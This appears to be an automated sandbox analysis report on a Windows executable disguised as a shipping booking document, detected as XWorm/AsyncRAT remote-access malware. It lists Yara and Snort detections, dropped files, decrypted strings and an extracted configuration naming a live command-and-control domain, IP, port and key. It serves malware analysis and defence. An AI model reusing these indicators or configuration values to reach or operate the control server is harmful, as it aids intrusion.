Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.310c7e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.31210c4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.310c7e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1844167553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2132, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
102.90.42.110	futurist2.ddns.net	Nigeria		29465	VCG-ASNG	true

Contacted Domains

Name	IP	Active
futurist2.ddns.net	102.90.42.110	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
futurist2.ddns.net	true	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["futurist2.ddns.net"], "Port": "20506", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\XClient.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\XClient.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: futurist2.ddns.net
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: 20506
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: <123456789>
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: <Xwormmm>
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: GRACEOFGOD
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: USB.exe
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: %LocalAppData%
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: XClient.exe

Uses 32bit PE files

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 4x nop then jmp 0506B5DCh	1_2_0506AC43
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 4x nop then jmp 0C4DA87Ch	11_2_0C4D9EE3
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 4x nop then jmp 050FA87Ch	28_2_050F9EE3
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 4x nop then jmp 04A7A87Ch	32_2_04A79EE3

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49743 -> 102.90.42.110:20506
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49747 -> 102.90.42.110:20506

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: futurist2.ddns.net

Uses dynamic DNS services

Source: unknown

DNS query: name: futurist2.ddns.net

Yara detected Generic Downloader

Source: Yara match

File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49741 -> 102.90.42.110:20506

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VCG-ASNG VCG-ASNG

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: futurist2.ddns.net

Source: powershell.exe, 00000019.00000002.2022501378.0000000007115000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2023383216.0000000007198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro$
Source: powershell.exe, 0000000D.00000002.1832933847.0000000007E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 0000000D.00000002.1810611459.000000000537C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1883850643.00000000051CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1958129515.000000000572B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1804203407.0000000004466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.00000000042B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1927085686.0000000004817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, BhTdjGetAH.exe, 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1804203407.0000000004311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.0000000004161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1927085686.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004521000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000001C.00000002.2211516335.0000000003071000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000020.00000002.2282271067.0000000002A29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1804203407.0000000004466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.00000000042B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1927085686.0000000004817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: powershell.exe, 00000015.00000002.1970141232.0000000008112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coXd
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp, FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775432995.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 0000000D.00000002.1804203407.0000000004311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.0000000004161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1927085686.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004521000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1802652172.0000000000448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.mic
Source: powershell.exe, 00000013.00000002.1868794212.000000000494E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.0000000004ABD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004E80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000D.00000002.1810611459.000000000537C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1883850643.00000000051CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1958129515.000000000572B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.BhTdjGetAH.exe.288d464.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.BhTdjGetAH.exe.2878b80.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 17.2.BhTdjGetAH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.XClient.exe.31210c4.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.XClient.exe.310c7e0.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.XClient.exe.31210c4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.XClient.exe.310c7e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000011.00000002.1844167553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.5810000.6.raw.unpack, -Module-.cs

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0146D4FC	1_2_0146D4FC
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_02FC70F0	1_2_02FC70F0
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_02FC0040	1_2_02FC0040
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_02FC001C	1_2_02FC001C
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05064F37	1_2_05064F37
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05064F48	1_2_05064F48
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_050646D8	1_2_050646D8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_050661D8	1_2_050661D8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_050661E8	1_2_050661E8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0506C878	1_2_0506C878
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05064B10	1_2_05064B10
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05066AB0	1_2_05066AB0
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05066AC0	1_2_05066AC0
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0565BD00	1_2_0565BD00
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0565C738	1_2_0565C738
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05650040	1_2_05650040
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0565935C	1_2_0565935C
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_012649C8	10_2_012649C8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_01264FC0	10_2_01264FC0
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_01261958	10_2_01261958
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_01261FE8	10_2_01261FE8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE0548	10_2_05CE0548
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE5550	10_2_05CE5550
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE6F73	10_2_05CE6F73
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE4F28	10_2_05CE4F28
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_00D8D4FC	11_2_00D8D4FC
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D4E07	11_2_0C4D4E07
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D4E18	11_2_0C4D4E18
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D697F	11_2_0C4D697F
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D49E0	11_2_0C4D49E0
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D6990	11_2_0C4D6990
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4DBA58	11_2_0C4DBA58
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D45A8	11_2_0C4D45A8
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D60A7	11_2_0C4D60A7
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D60B8	11_2_0C4D60B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042DB490	13_2_042DB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08333EA8	13_2_08333EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_083357AF	13_2_083357AF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08335780	13_2_08335780
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 17_2_01051958	17_2_01051958
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 17_2_01051FE8	17_2_01051FE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_0414B4A0	19_2_0414B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_0414B490	19_2_0414B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_045FB490	21_2_045FB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_068EB4A0	25_2_068EB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_068EB490	25_2_068EB490
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_02E7D4FC	28_2_02E7D4FC
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F46D8	28_2_050F46D8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F61D8	28_2_050F61D8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F61E8	28_2_050F61E8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F4F37	28_2_050F4F37
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F4F48	28_2_050F4F48
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F4B10	28_2_050F4B10
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050FBA58	28_2_050FBA58
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F6AB0	28_2_050F6AB0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F6AC0	28_2_050F6AC0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_056FF708	28_2_056FF708
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_056FD3D0	28_2_056FD3D0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 31_2_02851958	31_2_02851958
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_010BD4FC	32_2_010BD4FC
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A746D8	32_2_04A746D8
